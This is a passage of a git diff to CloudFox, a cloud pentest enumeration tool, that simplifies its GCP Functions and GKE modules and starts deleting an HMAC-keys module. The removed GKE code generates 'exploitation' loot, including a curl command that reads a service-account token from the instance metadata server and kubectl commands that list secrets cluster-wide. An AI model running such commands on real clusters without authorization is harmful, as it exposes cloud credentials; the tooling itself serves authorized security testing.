strings.Split(saDisplay, "@") - if len(parts) > 0 { - saDisplay = parts[0] + "@..." - } - } - - body = append(body, []string{ - m.GetProjectName(fn.ProjectID), - fn.ProjectID, - fn.Name, - fn.Region, - fn.State, - fn.Runtime, - triggerInfo, - fn.IngressSettings, - publicStatus, - saDisplay, - fn.VPCConnector, - secretsInfo, - }) - } - - // HTTP endpoints table - httpHeader := []string{ - "Function", - "Project Name", - "Project ID", - "URL", - "Ingress", - "Public", - "Service Account", - } - - var httpBody [][]string - for _, fn := range m.Functions { - if fn.TriggerType == "HTTP" && fn.TriggerURL != "" { - publicStatus := "No" - if fn.IsPublic { - publicStatus = "PUBLIC" - } - httpBody = append(httpBody, []string{ - fn.Name, - m.GetProjectName(fn.ProjectID), - fn.ProjectID, - fn.TriggerURL, - fn.IngressSettings, - publicStatus, - fn.ServiceAccount, - }) + // Format URL - no truncation + url := "-" + if fn.TriggerURL != "" { + url = fn.TriggerURL } - } - - // Public functions table - publicHeader := []string{ - "Function", - "Project Name", - "Project ID", - "Region", - "URL", - "Invokers", - "Service Account", - } - var publicBody [][]string - for _, fn := range m.Functions { - if fn.IsPublic { - publicBody = append(publicBody, []string{ - fn.Name, - m.GetProjectName(fn.ProjectID), - fn.ProjectID, - fn.Region, - fn.TriggerURL, - strings.Join(fn.InvokerMembers, ", "), - fn.ServiceAccount, - }) + // Format VPC connector + vpcConnector := "-" + if fn.VPCConnector != "" { + vpcConnector = fn.VPCConnector } - } - // Security analysis table (pentest-focused) - securityHeader := []string{ - "Risk", - "Function", - "Project Name", - "Project", - "Region", - "Public", - "Service Account", - "Reasons", - } - - var securityBody [][]string - criticalCount := 0 - highCount := 0 - for _, analysis := range m.SecurityAnalysis { - if analysis.RiskLevel == "CRITICAL" { - criticalCount++ - } else if analysis.RiskLevel == "HIGH" { - highCount++ - } - - publicStatus := "No" - if analysis.IsPublic { - publicStatus = "Yes" + // Format secrets count + secretsInfo := "-" + totalSecrets := fn.SecretEnvVarCount + fn.SecretVolumeCount + if totalSecrets > 0 { + secretsInfo = fmt.Sprintf("%d", totalSecrets) } - reasons := strings.Join(analysis.RiskReasons, "; ") - if len(reasons) > 60 { - reasons = reasons[:60] + "..." + // Format service account - no truncation + serviceAccount := fn.ServiceAccount + if serviceAccount == "" { + serviceAccount = "-" } - securityBody = append(securityBody, []string{ - analysis.RiskLevel, - analysis.FunctionName, - m.GetProjectName(analysis.ProjectID), - analysis.ProjectID, - analysis.Region, - publicStatus, - analysis.ServiceAccount, - reasons, - }) - } - - // Source code locations table - sourceHeader := []string{ - "Function", - "Project Name", - "Project", - "Source Type", - "Source Location", - } - - var sourceBody [][]string - for _, fn := range m.Functions { - if fn.SourceLocation != "" { - sourceBody = append(sourceBody, []string{ - fn.Name, + // If function has IAM bindings, create one row per binding + if len(fn.IAMBindings) > 0 { + for _, binding := range fn.IAMBindings { + body = append(body, []string{ + m.GetProjectName(fn.ProjectID), + fn.ProjectID, + fn.Name, + fn.Region, + fn.State, + fn.Runtime, + triggerInfo, + url, + fn.IngressSettings, + boolToYesNo(fn.IsPublic), + serviceAccount, + vpcConnector, + secretsInfo, + binding.Role, + binding.Member, + }) + } + } else { + // Function has no IAM bindings - single row + body = append(body, []string{ m.GetProjectName(fn.ProjectID), fn.ProjectID, - fn.SourceType, - fn.SourceLocation, + fn.Name, + fn.Region, + fn.State, + fn.Runtime, + triggerInfo, + url, + fn.IngressSettings, + boolToYesNo(fn.IsPublic), + serviceAccount, + vpcConnector, + secretsInfo, + "-", + "-", }) } } @@ -660,54 +354,18 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } // Build table files - tableFiles := []internal.TableFile{ - { + tableFiles := []internal.TableFile{} + if len(body) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ Name: globals.GCP_FUNCTIONS_MODULE_NAME, Header: header, Body: body, - }, - } - - if len(httpBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "functions-http", - Header: httpHeader, - Body: httpBody, - }) - } - - if len(publicBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "functions-public", - Header: publicHeader, - Body: publicBody, - }) - } - - // Add security analysis table - if len(securityBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "functions-security", - Header: securityHeader, - Body: securityBody, - }) - if criticalCount > 0 || highCount > 0 { - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d CRITICAL, %d HIGH risk function(s)!", criticalCount, highCount), globals.GCP_FUNCTIONS_MODULE_NAME) - } - } - - // Add source locations table - if len(sourceBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "functions-source", - Header: sourceHeader, - Body: sourceBody, }) } diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go index 64e3b5e3..ebeb5599 100644 --- a/gcp/commands/gke.go +++ b/gcp/commands/gke.go @@ -58,11 +58,10 @@ Attack Surface: type GKEModule struct { gcpinternal.BaseGCPModule - Clusters []GKEService.ClusterInfo - NodePools []GKEService.NodePoolInfo - SecurityAnalyses []GKEService.ClusterSecurityAnalysis - LootMap map[string]*internal.LootFile - mu sync.Mutex + Clusters []GKEService.ClusterInfo + NodePools []GKEService.NodePoolInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex } // ------------------------------ @@ -86,11 +85,10 @@ func runGCPGKECommand(cmd *cobra.Command, args []string) { } module := &GKEModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Clusters: []GKEService.ClusterInfo{}, - NodePools: []GKEService.NodePoolInfo{}, - SecurityAnalyses: []GKEService.ClusterSecurityAnalysis{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Clusters: []GKEService.ClusterInfo{}, + NodePools: []GKEService.NodePoolInfo{}, + LootMap: make(map[string]*internal.LootFile), } module.initializeLootFiles() @@ -108,23 +106,19 @@ func (m *GKEModule) Execute(ctx context.Context, logger internal.Logger) { return } - // Count clusters with issues - issueCount := 0 + // Count public clusters publicCount := 0 for _, cluster := range m.Clusters { - if len(cluster.SecurityIssues) > 0 { - issueCount++ - } if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { publicCount++ } } + msg := fmt.Sprintf("Found %d cluster(s), %d node pool(s)", len(m.Clusters), len(m.NodePools)) if publicCount > 0 { - logger.SuccessM(fmt.Sprintf("Found %d cluster(s), %d with public API endpoint", len(m.Clusters), publicCount), globals.GCP_GKE_MODULE_NAME) - } else { - logger.SuccessM(fmt.Sprintf("Found %d cluster(s)", len(m.Clusters)), globals.GCP_GKE_MODULE_NAME) + msg += fmt.Sprintf(" [%d with public API endpoint]", publicCount) } + logger.SuccessM(msg, globals.GCP_GKE_MODULE_NAME) m.writeOutput(ctx, logger) } @@ -152,15 +146,6 @@ func (m *GKEModule) processProject(ctx context.Context, projectID string, logger for _, cluster := range clusters { m.addClusterToLoot(cluster) - // Perform security analysis - analysis := gs.AnalyzeClusterSecurity(cluster, nodePools) - m.SecurityAnalyses = append(m.SecurityAnalyses, analysis) - m.addSecurityAnalysisToLoot(analysis) - } - - // Add node pool security info - for _, np := range nodePools { - m.addNodePoolSecurityToLoot(np) } m.mu.Unlock() @@ -173,324 +158,43 @@ func (m *GKEModule) processProject(ctx context.Context, projectID string, logger // Loot File Management // ------------------------------ func (m *GKEModule) initializeLootFiles() { - m.LootMap["gke-gcloud-commands"] = &internal.LootFile{ - Name: "gke-gcloud-commands", - Contents: "# GKE gcloud Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["gke-kubectl-commands"] = &internal.LootFile{ - Name: "gke-kubectl-commands", - Contents: "# GKE kubectl Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["gke-exploitation"] = &internal.LootFile{ - Name: "gke-exploitation", - Contents: "# GKE Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["gke-security-issues"] = &internal.LootFile{ - Name: "gke-security-issues", - Contents: "# GKE Security Issues Detected\n# Generated by CloudFox\n\n", - } - m.LootMap["gke-security-analysis"] = &internal.LootFile{ - Name: "gke-security-analysis", - Contents: "# GKE Security Analysis\n# Generated by CloudFox\n# Detailed risk assessment for GKE clusters\n\n", - } - m.LootMap["gke-exploit-commands"] = &internal.LootFile{ - Name: "gke-exploit-commands", - Contents: "# GKE Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["gke-risky-nodepools"] = &internal.LootFile{ - Name: "gke-risky-nodepools", - Contents: "# GKE Risky Node Pools\n# Generated by CloudFox\n# Node pools with excessive OAuth scopes or default SA\n\n", - } - m.LootMap["gke-security-recommendations"] = &internal.LootFile{ - Name: "gke-security-recommendations", - Contents: "# GKE Security Recommendations\n# Generated by CloudFox\n# Remediation commands for security issues\n\n", - } - m.LootMap["gke-no-binary-auth"] = &internal.LootFile{ - Name: "gke-no-binary-auth", - Contents: "# GKE Clusters WITHOUT Binary Authorization\n# Generated by CloudFox\n# These clusters allow untrusted container images\n\n", - } - m.LootMap["gke-autopilot-clusters"] = &internal.LootFile{ - Name: "gke-autopilot-clusters", - Contents: "# GKE Autopilot Clusters\n# Generated by CloudFox\n# Autopilot clusters have enhanced security by default\n\n", + m.LootMap["gke-commands"] = &internal.LootFile{ + Name: "gke-commands", + Contents: "# GKE Commands\n# Generated by CloudFox\n\n", } } func (m *GKEModule) addClusterToLoot(cluster GKEService.ClusterInfo) { - // gcloud commands - m.LootMap["gke-gcloud-commands"].Contents += fmt.Sprintf( - "# Cluster: %s (Project: %s, Location: %s)\n"+ + m.LootMap["gke-commands"].Contents += fmt.Sprintf( + "# Cluster: %s (%s)\n"+ + "# Project: %s\n"+ "gcloud container clusters describe %s --location=%s --project=%s\n"+ "gcloud container clusters get-credentials %s --location=%s --project=%s\n"+ - "gcloud container node-pools list --cluster=%s --location=%s --project=%s\n\n", - cluster.Name, cluster.ProjectID, cluster.Location, - cluster.Name, cluster.Location, cluster.ProjectID, - cluster.Name, cluster.Location, cluster.ProjectID, - cluster.Name, cluster.Location, cluster.ProjectID, - ) - - // kubectl commands (after getting credentials) - m.LootMap["gke-kubectl-commands"].Contents += fmt.Sprintf( - "# Cluster: %s (get credentials first with gcloud command above)\n"+ + "gcloud container node-pools list --cluster=%s --location=%s --project=%s\n\n"+ + "# kubectl commands (after getting credentials):\n"+ "kubectl cluster-info\n"+ "kubectl get nodes -o wide\n"+ "kubectl get namespaces\n"+ - "kubectl get serviceaccounts --all-namespaces\n"+ - "kubectl get clusterroles\n"+ - "kubectl get clusterrolebindings\n"+ - "kubectl auth can-i --list\n"+ - "kubectl get secrets --all-namespaces\n"+ - "kubectl get configmaps --all-namespaces\n\n", - cluster.Name, - ) - - // Exploitation commands - m.LootMap["gke-exploitation"].Contents += fmt.Sprintf( - "# Cluster: %s (Project: %s)\n"+ - "# Endpoint: %s\n"+ - "# Service Account: %s\n\n"+ - "# Get credentials:\n"+ - "gcloud container clusters get-credentials %s --location=%s --project=%s\n\n"+ - "# Check your permissions:\n"+ - "kubectl auth can-i --list\n"+ - "kubectl auth can-i create pods\n"+ - "kubectl auth can-i get secrets\n\n"+ - "# List pods with host PID/network (potential container escape):\n"+ - "kubectl get pods -A -o json | jq '.items[] | select(.spec.hostNetwork==true or .spec.hostPID==true) | {namespace: .metadata.namespace, name: .metadata.name, hostNetwork: .spec.hostNetwork, hostPID: .spec.hostPID}'\n\n"+ - "# Find pods with service accounts:\n"+ - "kubectl get pods -A -o json | jq '.items[] | {namespace: .metadata.namespace, name: .metadata.name, serviceAccount: .spec.serviceAccountName}'\n\n", - cluster.Name, cluster.ProjectID, - cluster.Endpoint, - cluster.NodeServiceAccount, + "kubectl auth can-i --list\n\n", + cluster.Name, cluster.Location, + cluster.ProjectID, + cluster.Name, cluster.Location, cluster.ProjectID, + cluster.Name, cluster.Location, cluster.ProjectID, cluster.Name, cluster.Location, cluster.ProjectID, ) - - // Security issues - if len(cluster.SecurityIssues) > 0 { - m.LootMap["gke-security-issues"].Contents += fmt.Sprintf( - "# CLUSTER: %s (Project: %s)\n"+ - "# Location: %s\n"+ - "# Issues:\n", - cluster.Name, cluster.ProjectID, cluster.Location, - ) - for _, issue := range cluster.SecurityIssues { - m.LootMap["gke-security-issues"].Contents += fmt.Sprintf(" - %s\n", issue) - } - m.LootMap["gke-security-issues"].Contents += "\n" - } - - // Binary Authorization missing - if !cluster.BinaryAuthorization { - m.LootMap["gke-no-binary-auth"].Contents += fmt.Sprintf( - "# CLUSTER: %s (Project: %s)\n"+ - "# Location: %s\n"+ - "# Binary Authorization: Disabled\n"+ - "# Enable with:\n"+ - "gcloud container clusters update %s \\\n"+ - " --location=%s \\\n"+ - " --binauthz-evaluation-mode=PROJECT_SINGLETON_POLICY_ENFORCE \\\n"+ - " --project=%s\n\n", - cluster.Name, cluster.ProjectID, - cluster.Location, - cluster.Name, cluster.Location, cluster.ProjectID, - ) - } - - // Autopilot clusters - if cluster.Autopilot { - m.LootMap["gke-autopilot-clusters"].Contents += fmt.Sprintf( - "# CLUSTER: %s (Project: %s)\n"+ - "# Location: %s\n"+ - "# Mode: Autopilot\n"+ - "# Security Benefits:\n"+ - "# - Hardened node configuration\n"+ - "# - Workload Identity enabled by default\n"+ - "# - Shielded nodes by default\n"+ - "# - Container-Optimized OS only\n"+ - "# - No SSH access to nodes\n\n", - cluster.Name, cluster.ProjectID, cluster.Location, - ) - } - - // Security recommendations - m.addClusterSecurityRecommendations(cluster) -} - -// addClusterSecurityRecommendations adds remediation commands for GKE security issues -func (m *GKEModule) addClusterSecurityRecommendations(cluster GKEService.ClusterInfo) { - hasRecommendations := false - recommendations := fmt.Sprintf( - "# CLUSTER: %s (Project: %s, Location: %s)\n", - cluster.Name, cluster.ProjectID, cluster.Location, - ) - - // No Workload Identity - if cluster.WorkloadIdentity == "" { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Workload Identity not configured\n"+ - "gcloud container clusters update %s \\\n"+ - " --location=%s \\\n"+ - " --workload-pool=%s.svc.id.goog \\\n"+ - " --project=%s\n\n", - cluster.Name, cluster.Location, cluster.ProjectID, cluster.ProjectID, - ) - } - - // No network policy - if !cluster.NetworkPolicy { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Network policy not enabled\n"+ - "gcloud container clusters update %s \\\n"+ - " --location=%s \\\n"+ - " --enable-network-policy \\\n"+ - " --project=%s\n\n", - cluster.Name, cluster.Location, cluster.ProjectID, - ) - } - - // No Binary Authorization - if !cluster.BinaryAuthorization { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Binary Authorization not enabled\n"+ - "gcloud container clusters update %s \\\n"+ - " --location=%s \\\n"+ - " --binauthz-evaluation-mode=PROJECT_SINGLETON_POLICY_ENFORCE \\\n"+ - " --project=%s\n\n", - cluster.Name, cluster.Location, cluster.ProjectID, - ) - } - - // No Shielded Nodes - if !cluster.ShieldedNodes { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Shielded nodes not enabled\n"+ - "gcloud container clusters update %s \\\n"+ - " --location=%s \\\n"+ - " --enable-shielded-nodes \\\n"+ - " --project=%s\n\n", - cluster.Name, cluster.Location, cluster.ProjectID, - ) - } - - // Legacy ABAC enabled - if cluster.LegacyABAC { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Legacy ABAC enabled (HIGH RISK)\n"+ - "gcloud container clusters update %s \\\n"+ - " --location=%s \\\n"+ - " --no-enable-legacy-authorization \\\n"+ - " --project=%s\n\n", - cluster.Name, cluster.Location, cluster.ProjectID, - ) - } - - // Public endpoint without master authorized networks - if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Public endpoint without master authorized networks\n"+ - "gcloud container clusters update %s \\\n"+ - " --location=%s \\\n"+ - " --enable-master-authorized-networks \\\n"+ - " --master-authorized-networks= \\\n"+ - " --project=%s\n\n", - cluster.Name, cluster.Location, cluster.ProjectID, - ) - } - - if hasRecommendations { - m.LootMap["gke-security-recommendations"].Contents += recommendations + "\n" - } -} - -func (m *GKEModule) addSecurityAnalysisToLoot(analysis GKEService.ClusterSecurityAnalysis) { - if analysis.RiskLevel == "CRITICAL" || analysis.RiskLevel == "HIGH" { - m.LootMap["gke-security-analysis"].Contents += fmt.Sprintf( - "# [%s] CLUSTER: %s (Project: %s)\n"+ - "# Location: %s\n", - analysis.RiskLevel, analysis.ClusterName, analysis.ProjectID, analysis.Location, - ) - - if len(analysis.RiskReasons) > 0 { - m.LootMap["gke-security-analysis"].Contents += "# Risk Reasons:\n" - for _, reason := range analysis.RiskReasons { - m.LootMap["gke-security-analysis"].Contents += fmt.Sprintf("# - %s\n", reason) - } - } - - if len(analysis.AttackSurface) > 0 { - m.LootMap["gke-security-analysis"].Contents += "# Attack Surface:\n" - for _, surface := range analysis.AttackSurface { - m.LootMap["gke-security-analysis"].Contents += fmt.Sprintf("# - %s\n", surface) - } - } - - if len(analysis.PrivescPaths) > 0 { - m.LootMap["gke-security-analysis"].Contents += "# Privilege Escalation Paths:\n" - for _, path := range analysis.PrivescPaths { - m.LootMap["gke-security-analysis"].Contents += fmt.Sprintf("# - %s\n", path) - } - } - m.LootMap["gke-security-analysis"].Contents += "\n" - } - - // Add exploit commands - if len(analysis.ExploitCommands) > 0 { - m.LootMap["gke-exploit-commands"].Contents += fmt.Sprintf( - "# [%s] CLUSTER: %s (Project: %s)\n", - analysis.RiskLevel, analysis.ClusterName, analysis.ProjectID, - ) - for _, cmd := range analysis.ExploitCommands { - m.LootMap["gke-exploit-commands"].Contents += cmd + "\n" - } - m.LootMap["gke-exploit-commands"].Contents += "\n" - } -} - -func (m *GKEModule) addNodePoolSecurityToLoot(np GKEService.NodePoolInfo) { - // Only add risky node pools - if np.HasCloudPlatformScope || np.ServiceAccount == "default" || - strings.HasSuffix(np.ServiceAccount, "-compute@developer.gserviceaccount.com") { - - m.LootMap["gke-risky-nodepools"].Contents += fmt.Sprintf( - "# Cluster: %s, Node Pool: %s (Project: %s)\n"+ - "# Service Account: %s\n", - np.ClusterName, np.Name, np.ProjectID, np.ServiceAccount, - ) - - if np.HasCloudPlatformScope { - m.LootMap["gke-risky-nodepools"].Contents += "# WARNING: cloud-platform scope - full GCP access!\n" - } - - if len(np.RiskyScopes) > 0 { - m.LootMap["gke-risky-nodepools"].Contents += "# Risky OAuth Scopes:\n" - for _, scope := range np.RiskyScopes { - m.LootMap["gke-risky-nodepools"].Contents += fmt.Sprintf("# - %s\n", scope) - } - } - - // Add metadata access command - m.LootMap["gke-risky-nodepools"].Contents += fmt.Sprintf( - "# From pod on this node pool, access SA token:\n"+ - "curl -s -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token\n\n", - ) - } } // ------------------------------ // Output Generation // ------------------------------ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main clusters table with enhanced columns - header := []string{ + // Clusters table - merged with config columns, removed Issues + clusterHeader := []string{ "Project Name", "Project ID", "Name", "Location", + "Endpoint", "Status", "Version", "Mode", @@ -500,79 +204,60 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { "WorkloadID", "Shielded", "BinAuth", - "Issues", + "Release Channel", + "ConfigConnector", } - var body [][]string + var clusterBody [][]string for _, cluster := range m.Clusters { - // Format workload identity - workloadIDStatus := "No" - if cluster.WorkloadIdentity != "" { - workloadIDStatus = "Yes" - } - - // Count issues - issueCount := len(cluster.SecurityIssues) - issueDisplay := "-" - if issueCount > 0 { - issueDisplay = fmt.Sprintf("%d issues", issueCount) - } - // Cluster mode clusterMode := "Standard" if cluster.Autopilot { clusterMode = "Autopilot" } - body = append(body, []string{ + // Release channel + releaseChannel := cluster.ReleaseChannel + if releaseChannel == "" || releaseChannel == "UNSPECIFIED" { + releaseChannel = "-" + } + + // Endpoint display + endpoint := cluster.Endpoint + if endpoint == "" { + endpoint = "-" + } + + clusterBody = append(clusterBody, []string{ m.GetProjectName(cluster.ProjectID), cluster.ProjectID, cluster.Name, cluster.Location, + endpoint, cluster.Status, cluster.CurrentMasterVersion, clusterMode, boolToYesNo(cluster.PrivateCluster), boolToYesNo(cluster.MasterAuthorizedOnly), boolToYesNo(cluster.NetworkPolicy), - workloadIDStatus, + boolToYesNo(cluster.WorkloadIdentity != ""), boolToYesNo(cluster.ShieldedNodes), boolToYesNo(cluster.BinaryAuthorization), - issueDisplay, + releaseChannel, + boolToYesNo(cluster.ConfigConnector), }) } - // Security issues table - issuesHeader := []string{ - "Cluster", + // Node pools table - no truncation on service account, added Cloud Platform Scope column + nodePoolHeader := []string{ "Project Name", "Project ID", - "Location", - "Issue", - } - - var issuesBody [][]string - for _, cluster := range m.Clusters { - for _, issue := range cluster.SecurityIssues { - issuesBody = append(issuesBody, []string{ - cluster.Name, - m.GetProjectName(cluster.ProjectID), - cluster.ProjectID, - cluster.Location, - issue, - }) - } - } - - // Node pools table - nodePoolHeader := []string{ "Cluster", "Node Pool", - "Project Name", - "Project ID", "Machine Type", "Node Count", "Service Account", + "Cloud Platform Scope", "Auto Upgrade", "Secure Boot", "Preemptible", @@ -580,147 +265,24 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { var nodePoolBody [][]string for _, np := range m.NodePools { + // No truncation on service account saDisplay := np.ServiceAccount - if saDisplay == "default" { - saDisplay = "DEFAULT (INSECURE)" - } else if strings.Contains(saDisplay, "@") { - parts := strings.Split(saDisplay, "@") - saDisplay = parts[0] + "@..." - } - - preemptible := "No" - if np.Preemptible || np.Spot { - preemptible = "Yes" + if saDisplay == "" { + saDisplay = "-" } nodePoolBody = append(nodePoolBody, []string{ - np.ClusterName, - np.Name, m.GetProjectName(np.ProjectID), np.ProjectID, + np.ClusterName, + np.Name, np.MachineType, fmt.Sprintf("%d", np.NodeCount), saDisplay, + boolToYesNo(np.HasCloudPlatformScope), boolToYesNo(np.AutoUpgrade), boolToYesNo(np.SecureBoot), - preemptible, - }) - } - - // Security analysis table (pentest-focused) - analysisHeader := []string{ - "Risk", - "Cluster", - "Project Name", - "Project", - "Attack Surface", - "Privesc Paths", - } - - var analysisBody [][]string - for _, analysis := range m.SecurityAnalyses { - // Summarize attack surface and privesc paths - attackSummary := "-" - if len(analysis.AttackSurface) > 0 { - attackSummary = fmt.Sprintf("%d vectors", len(analysis.AttackSurface)) - } - - privescSummary := "-" - if len(analysis.PrivescPaths) > 0 { - privescSummary = fmt.Sprintf("%d paths", len(analysis.PrivescPaths)) - } - - analysisBody = append(analysisBody, []string{ - analysis.RiskLevel, - analysis.ClusterName, - m.GetProjectName(analysis.ProjectID), - analysis.ProjectID, - attackSummary, - privescSummary, - }) - } - - // Risky node pools table - riskyNPHeader := []string{ - "Cluster", - "Node Pool", - "Service Account", - "Cloud Platform Scope", - "Risky Scopes", - "Project Name", - "Project", - } - - var riskyNPBody [][]string - for _, np := range m.NodePools { - if np.HasCloudPlatformScope || np.ServiceAccount == "default" || - strings.HasSuffix(np.ServiceAccount, "-compute@developer.gserviceaccount.com") { - - cloudPlatform := "No" - if np.HasCloudPlatformScope { - cloudPlatform = "YES!" - } - - scopeCount := "-" - if len(np.RiskyScopes) > 0 { - scopeCount = fmt.Sprintf("%d risky", len(np.RiskyScopes)) - } - - riskyNPBody = append(riskyNPBody, []string{ - np.ClusterName, - np.Name, - np.ServiceAccount, - cloudPlatform, - scopeCount, - m.GetProjectName(np.ProjectID), - np.ProjectID, - }) - } - } - - // Cluster configuration table (addons and maintenance) - configHeader := []string{ - "Cluster", - "Project Name", - "Project ID", - "Mode", - "Release Channel", - "ConfigConnector", - "Istio/ASM", - "Node AutoProv", - "Maintenance", - "Exclusions", - } - - var configBody [][]string - for _, cluster := range m.Clusters { - clusterMode := "Standard" - if cluster.Autopilot { - clusterMode = "Autopilot" - } - releaseChannel := cluster.ReleaseChannel - if releaseChannel == "" || releaseChannel == "UNSPECIFIED" { - releaseChannel = "None" - } - maintenanceWindow := cluster.MaintenanceWindow - if maintenanceWindow == "" { - maintenanceWindow = "Not set" - } - exclusions := "-" - if len(cluster.MaintenanceExclusions) > 0 { - exclusions = fmt.Sprintf("%d exclusions", len(cluster.MaintenanceExclusions)) - } - configBody = append(configBody, []string{ - cluster.Name, - m.GetProjectName(cluster.ProjectID), - cluster.ProjectID, - clusterMode, - releaseChannel, - boolToYesNo(cluster.ConfigConnector), - boolToYesNo(cluster.IstioEnabled), - boolToYesNo(cluster.NodeAutoProvisioning), - maintenanceWindow, - exclusions, + boolToYesNo(np.Preemptible || np.Spot), }) } @@ -732,20 +294,14 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { } } - // Build table files - tableFiles := []internal.TableFile{ - { - Name: globals.GCP_GKE_MODULE_NAME, - Header: header, - Body: body, - }, - } + // Build table files - only 2 tables now + tableFiles := []internal.TableFile{} - if len(issuesBody) > 0 { + if len(clusterBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: "gke-security-issues", - Header: issuesHeader, - Body: issuesBody, + Name: "gke-clusters", + Header: clusterHeader, + Body: clusterBody, }) } @@ -757,29 +313,6 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { }) } - if len(analysisBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "gke-security-analysis", - Header: analysisHeader, - Body: analysisBody, - }) - } - - if len(riskyNPBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "gke-risky-nodepools", - Header: riskyNPHeader, - Body: riskyNPBody, - }) - } - - // Always add cluster config table - tableFiles = append(tableFiles, internal.TableFile{ - Name: "gke-cluster-config", - Header: configHeader, - Body: configBody, - }) - output := GKEOutput{ Table: tableFiles, Loot: lootFiles, diff --git a/gcp/commands/hmackeys.go b/gcp/commands/hmackeys.go deleted file mode 100644 index bc231280..00000000 --- a/gcp/commands/hmackeys.go +++ /dev/null @@ -1,282 +0,0 @@ -package commands - -import ( - "context" - "fmt" - "strings" - "sync" - "time" - - hmacservice "github.com/BishopFox/cloudfox/gcp/services/hmacService" - "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - "github.com/spf13/cobra" -) - -var GCPHMACKeysCommand = &cobra.Command{ - Use: globals.GCP_HMACKEYS_MODULE_NAME, - Aliases: []string{"hmac", "s3keys", "storage-keys"}, - Short: "Enumerate GCS HMAC keys (S3-compatible access)", - Long: `Enumerate GCS HMAC keys for S3-compatible access. - -HMAC keys provide S3-compatible access to Google Cloud Storage buckets. -These are often overlooked credentials that can persist even after other -access is revoked. - -Features: -- Lists all HMAC keys with service account associations -- Identifies active vs inactive keys -- Detects old keys needing rotation -- Generates S3-compatible access commands for penetration testing`, - Run: runGCPHMACKeysCommand, -} - -type HMACKeysModule struct { - gcpinternal.BaseGCPModule - HMACKeys []hmacservice.HMACKeyInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex -} - -type HMACKeysOutput struct { - Table []internal.TableFile - Loot []internal.LootFile -} - -func (o HMACKeysOutput) TableFiles() []internal.TableFile { return o.Table } -func (o HMACKeysOutput) LootFiles() []internal.LootFile { return o.Loot } - -func runGCPHMACKeysCommand(cmd *cobra.Command, args []string) { - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_HMACKEYS_MODULE_NAME) - if err != nil { - return - } - - module := &HMACKeysModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - HMACKeys: []hmacservice.HMACKeyInfo{}, - LootMap: make(map[string]*internal.LootFile), - } - module.initializeLootFiles() - module.Execute(cmdCtx.Ctx, cmdCtx.Logger) -} - -func (m *HMACKeysModule) Execute(ctx context.Context, logger internal.Logger) { - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_HMACKEYS_MODULE_NAME, m.processProject) - - if len(m.HMACKeys) == 0 { - logger.InfoM("No HMAC keys found", globals.GCP_HMACKEYS_MODULE_NAME) - return - } - - // Count active keys - activeCount := 0 - for _, key := range m.HMACKeys { - if key.IsActive { - activeCount++ - } - } - - logger.SuccessM(fmt.Sprintf("Found %d HMAC key(s) (%d active)", len(m.HMACKeys), activeCount), globals.GCP_HMACKEYS_MODULE_NAME) - m.writeOutput(ctx, logger) -} - -func (m *HMACKeysModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Enumerating HMAC keys in project: %s", projectID), globals.GCP_HMACKEYS_MODULE_NAME) - } - - svc := hmacservice.New() - keys, err := svc.ListHMACKeys(projectID) - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_HMACKEYS_MODULE_NAME, - fmt.Sprintf("Could not enumerate HMAC keys in project %s", projectID)) - return - } - - m.mu.Lock() - m.HMACKeys = append(m.HMACKeys, keys...) - for _, key := range keys { - m.addKeyToLoot(key) - } - m.mu.Unlock() -} - -func (m *HMACKeysModule) initializeLootFiles() { - m.LootMap["hmac-active-keys"] = &internal.LootFile{ - Name: "hmac-active-keys", - Contents: "# Active HMAC Keys (S3-compatible access)\n# Generated by CloudFox\n# These can be used with AWS CLI for GCS access\n\n", - } - m.LootMap["hmac-s3-commands"] = &internal.LootFile{ - Name: 